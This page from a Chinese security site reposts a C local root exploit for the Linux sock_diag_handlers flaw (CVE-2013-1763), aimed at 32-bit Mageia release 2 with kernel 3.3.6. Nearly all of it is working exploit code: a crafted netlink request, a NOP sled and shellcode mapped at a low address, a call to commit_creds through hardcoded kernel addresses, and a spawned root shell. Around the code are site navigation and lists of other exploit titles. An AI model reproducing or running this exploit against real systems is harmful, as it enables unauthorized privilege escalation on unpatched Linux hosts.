首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mageia Release 2 sock_diag_handlers Local Root
来源:echo.or.id 作者:y3dips 发布时间:2013-03-25   
/* Exploit Title: Mageia release 2 (32bit) sock_diag_handlers Local root exploit
 Date: 22-03-2013
 Exploit Author: y3dips@echo.or.id | @y3dips
 Vendor Homepage: http://www.mageia.org/en/
 Software Link: http://www.mageia.org/en/downloads/
 Version: Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686
 Tested on: Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686
 CVE : 2013-1763 */

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
 
int __attribute__((regparm(3)))
kcode()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
} 

char loncat[] = "\x55\x89\xe5\xb8\x3c\x87\x04\x08\xff\xd0\x5d\xc3\x55\x89\xe5\x81\xec\x58\x02"; 
                /*asm("mov $kcode, %eax; call  %eax");*/
  
int trigger() {
    int socks;
    unsigned long mmap_start = 0x10000;
    unsigned long mmap_size= 0x120000;
    void *payload;
    struct { 
	struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
 
    socks = socket(PF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
    if (socks < 0)
        { printf("[+] Can't create sock diag socket...\n");
        return -1; }
 
    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_REQUEST;
    req.r.sdiag_family = 185; /*nl_table-sock_diag_handlers/4*/
 
    payload=mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
    if ((long)payload == -1) 
        { printf("[+] Failed to mmap() at target.\n");
        return -1; }
    
    *(unsigned long *)&loncat[4] =(unsigned long)kcode;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(loncat), loncat, sizeof(loncat));
 
    send(socks, &req, sizeof(req), 0);
}

int main()
{
	printf("[+] Mageia release 2 (32bit) sock_diag_handlers Local root exploit\n");
	/* Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686*/	
	commit_creds = (_commit_creds) 0xc0159cd0;
    	prepare_kernel_cred = (_prepare_kernel_cred) 0xc0159ed0;
        printf("[+] Triggering payload and Exploiting Sockz...\n");
        trigger();
	if(getuid()) {
		printf("[+] Exploit Failed...\n");
		return -1;
	}
	printf("[+] Got root!...\n");
        execl("/bin/sh", "/bin/sh", NULL);	
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache Struts ParametersInterc
·Mutiny Remote Command Executio
·EastFTP ActiveX Control 0Day
·KingView Log File Parsing Buff
·TP-Link TL-WR740N Wireless Rou
·IconCool MP3 WAV Converter 3.0
·BlazeVideo HDTV Player 6.6.0.2
·LiquidXML Studio 2012 ActiveX
·Cool PDF Image Stream Buffer O
·LiquidXML Studio 2010 ActiveX
·Sami FTP Server 2.0.1 PUT Comm
·Mitsubishi MX ActiveX Componen
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved